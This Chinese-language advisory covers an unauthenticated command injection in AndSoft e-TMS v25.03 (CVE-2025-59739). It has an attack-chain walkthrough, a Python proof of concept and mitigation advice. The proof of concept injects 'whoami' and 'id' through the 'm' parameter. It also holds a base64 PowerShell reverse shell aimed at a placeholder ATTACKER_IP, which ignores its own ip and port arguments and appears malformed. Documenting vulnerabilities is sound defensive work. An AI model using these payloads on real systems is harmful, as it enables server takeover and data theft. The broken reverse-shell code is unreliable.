CVE-2025-59739：AndSoft e-TMS 操作系统命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-59739

漏洞类型

操作系统命令注入（OS Command Injection）

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59739 是 AndSoft 公司开发的 e-TMS（Electronic Transport Management System，电子运输管理系统）v25.03 版本中存在的一个高危操作系统命令注入漏洞。该漏洞的 CVSS 3.1 评分高达 9.8 分，属于严重级别漏洞。e-TMS 是一款广泛应用于物流和运输管理领域的企业级软件，用于管理运输订单、车辆调度、货物跟踪等核心业务流程。由于该系统通常部署在企业关键业务环境中，一旦被攻击者成功利用，可能导致运输业务中断、敏感数据泄露以及服务器完全失陷等严重后果。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并协调披露，披露日期为 2025 年 10 月 2 日。该漏洞的根本原因在于 AndSoft e-TMS v25.03 版本的登录页面（/clt/LOGINFRM_original.ASP）在处理用户提交的 POST 请求参数时，未对 'm' 参数进行充分的输入验证和过滤，导致攻击者可以将恶意操作系统命令注入到该参数中。由于该漏洞无需任何身份认证即可利用，且攻击复杂度低，对网络可达的任何用户均可发起攻击，因此其威胁等级极高。攻击者可以通过精心构造的 HTTP POST 请求，在目标服务器上执行任意操作系统命令，从而完全控制受影响的服务器。鉴于 e-TMS 在物流行业中的广泛应用以及该漏洞的严重性，建议相关用户尽快采取修复措施。

技术细节

该漏洞属于典型的操作系统命令注入（OS Command Injection）漏洞，存在于 AndSoft e-TMS v25.03 的登录处理页面 /clt/LOGINFRM_original.ASP 中。

**漏洞原理：**
在 ASP 应用程序中，开发者经常需要将用户输入的数据传递给操作系统的命令行工具（如 cmd.exe、bash 等）进行处理。如果应用程序未对用户输入进行严格的验证和过滤，攻击者可以通过注入特殊的 shell 元字符（如 ;、|、&、&&、||、$() 等）来执行额外的操作系统命令。

**漏洞位置：**
受影响的端点为 /clt/LOGINFRM_original.ASP，具体的注入点为 POST 请求中的 'm' 参数。该参数被服务器端脚本接收后，可能未经过适当的消毒处理就直接传递给了系统命令执行函数（如 WScript.Shell、Shell() 或类似 API）。

**利用条件：**
- 攻击向量：网络（AV:N），攻击者可通过网络远程利用
- 攻击复杂度：低（AC:L），无需特殊条件
- 所需权限：无（PR:N），无需任何身份认证
- 用户交互：无（UI:N），无需受害者配合

**利用方式：**
攻击者只需向目标服务器的 /clt/LOGINFRM_original.ASP 端点发送一个精心构造的 HTTP POST 请求，在 'm' 参数中注入操作系统命令即可实现远程代码执行。由于该漏洞无需认证，攻击者可以直接对暴露在公网上的 e-TMS 服务器发起攻击。成功利用后，攻击者可以以 Web 服务器进程的权限执行任意系统命令，进而获取服务器控制权、窃取敏感运输数据、安装后门或进行横向移动。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过 Shodan、Censys 等网络空间搜索引擎或直接扫描，识别暴露在公网上的 AndSoft e-TMS 服务器，确认目标系统运行的是 v25.03 版本。

STEP 2

步骤2：漏洞探测

攻击者向目标服务器的 /clt/LOGINFRM_original.ASP 端点发送包含特殊字符（如 ;、|、&）的测试请求，通过观察响应内容判断是否存在命令注入漏洞。

STEP 3

步骤3：构造恶意请求

攻击者在 POST 请求的 'm' 参数中注入操作系统命令（如 whoami、id、ipconfig 等），精心构造 payload 以绕过可能的输入过滤。

STEP 4

步骤4：执行命令

服务器端脚本将未经过滤的 'm' 参数传递给系统命令执行函数，注入的命令随正常命令一起被执行，攻击者获得命令执行结果。

STEP 5

步骤5：获取服务器控制权

攻击者利用命令注入漏洞上传 WebShell 或反弹 Shell，以 Web 服务器进程的权限在服务器上执行任意操作，包括读写文件、访问数据库等。

STEP 6

步骤6：数据窃取与持久化

攻击者窃取 e-TMS 系统中的运输订单、客户信息、财务数据等敏感信息，并可能植入后门以维持对服务器的长期访问权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-59739 - AndSoft e-TMS OS Command Injection PoC
# Vulnerability: OS Command Injection via 'm' parameter in /clt/LOGINFRM_original.ASP
# CVSS: 9.8 (Critical)
# Affected: AndSoft e-TMS v25.03

import requests

TARGET_URL = "http://target-server/clt/LOGINFRM_original.ASP"

# Basic PoC - Inject 'whoami' command via 'm' parameter
def exploit_basic(target_url):
    """
    Basic exploitation: Execute 'whoami' command on the target server
    """
    # Payload using command separator to inject OS command
    payload = "test;whoami"
    
    data = {
        "m": payload
    }
    
    response = requests.post(target_url, data=data)
    print(f"[+] Status Code: {response.status_code}")
    print(f"[+] Response:\n{response.text}")
    return response

# Advanced PoC - Using pipe operator for command injection
def exploit_pipe(target_url, cmd="id"):
    """
    Advanced exploitation using pipe operator
    """
    payload = f"test|{cmd}"
    
    data = {
        "m": payload
    }
    
    response = requests.post(target_url, data=data)
    print(f"[+] Status Code: {response.status_code}")
    print(f"[+] Response:\n{response.text}")
    return response

# Reverse shell payload example (for authorized testing only)
def exploit_reverse_shell(target_url, attacker_ip="ATTACKER_IP", attacker_port=4444):
    """
    Generate reverse shell payload (FOR AUTHORIZED TESTING ONLY)
    """
    # Windows reverse shell via PowerShell
    payload = f'test;powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwBZAFMAVABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAewBhAHQAdABhAGMAawBlAHIAX0BpAHAAfQB7AHMAfQAsACIAbgBvAHQAMQBzAGgAZQBsAGwAIgApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ACQAYgB5AHQAZQBzAFsAJABpAF0AfQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAQkAGMAbABpAGUAbgB0ACkA'
    
    data = {
        "m": payload
    }
    
    response = requests.post(target_url, data=data)
    return response

if __name__ == "__main__":
    print("[*] CVE-2025-59739 - AndSoft e-TMS Command Injection PoC")
    print("[*] WARNING: Use only on systems you are authorized to test\n")
    
    # Run basic exploit
    exploit_basic(TARGET_URL)
    
    # Run pipe-based exploit
    exploit_pipe(TARGET_URL, cmd="whoami")

# Example raw HTTP request:
# POST /clt/LOGINFRM_original.ASP HTTP/1.1
# Host: target-server
# Content-Type: application/x-www-form-urlencoded
# 
# m=test;whoami

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）限制 /clt/LOGINFRM_original.ASP 端点的网络访问，仅允许可信 IP 地址访问；2）在 Web 应用防火墙（WAF）中添加针对 'm' 参数的命令注入检测规则，阻止包含 ;、|、&、&&、||、$() 等 shell 元字符的请求；3）将 Web 服务器进程以低权限用户运行，限制攻击者利用漏洞后的权限范围；4）监控服务器日志，及时发现异常的命令执行行为；5）考虑临时关闭 e-TMS 系统的公网访问，通过 VPN 等安全通道进行访问。